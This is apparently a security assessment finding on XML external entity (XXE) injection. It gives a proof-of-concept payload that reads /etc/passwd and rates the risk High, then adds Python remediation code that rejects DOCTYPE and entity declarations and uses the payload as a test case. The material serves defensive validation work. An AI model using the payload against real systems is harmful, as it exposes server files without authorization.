V5 - Validation/Sanitization
XXE
POC
Provide the following input as the XML content:
<?xml version="1.0"?>
<!DOCTYPE cdl [<!ENTITY asd SYSTEM "file:///etc/passwd">]>
&asd;
For more info, please refer to: https://blog.cobalt.io/how-to-execute-an-xml-external-entity-injection-xxe-5d5c262d5b16
Impact
High
Likelihood
High
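One way to close the XXE finding above is to reject any document that carries a DOCTYPE or entity declaration before it reaches the application's parser. This is an added example, not code from the assessed application; the choice of Python and the names `parse_untrusted_xml` and `ForbiddenXML` are assumptions.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class ForbiddenXML(ValueError):
    """Raised when a document uses DTD features that enable XXE."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    raise ForbiddenXML(f"DOCTYPE declaration not allowed (root name: {name!r})")


def _reject_entity_decl(name, is_param, value, base, system_id, public_id, notation):
    raise ForbiddenXML(f"entity declaration not allowed: {name!r}")


def _reject_external_ref(context, base, system_id, public_id):
    raise ForbiddenXML(f"external entity reference not allowed: {system_id!r}")


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Parse XML only if it contains no DTD, entity declaration or external reference."""
    guard = expat.ParserCreate()
    # Handlers fire while the prolog is read, so parsing stops before any entity is expanded.
    guard.StartDoctypeDeclHandler = _reject_doctype
    guard.EntityDeclHandler = _reject_entity_decl
    guard.ExternalEntityRefHandler = _reject_external_ref
    try:
        guard.Parse(data, True)
    except expat.ExpatError as exc:
        raise ValueError(f"malformed XML: {exc}") from exc
    # The guard pass found no DTD constructs, so the tree can be built normally.
    return ET.fromstring(data)


# The PoC input from this finding, used here as a rejection test case.
POC_FROM_PAGE = (b'<?xml version="1.0"?> <!DOCTYPE cdl [<!ENTITY asd SYSTEM '
                 b'"file:///etc/passwd">]> &asd;')
# Constructed benign document for comparison.
BENIGN = b'<?xml version="1.0"?><order><id>42</id></order>'

if __name__ == "__main__":
    print(parse_untrusted_xml(BENIGN).find("id").text)
    try:
        parse_untrusted_xml(POC_FROM_PAGE)
    except ForbiddenXML as exc:
        print("rejected:", exc)
```

Rejecting the DOCTYPE outright also blocks entity-expansion inputs that never reference an external resource; applications that genuinely need DTDs require a narrower policy than this one.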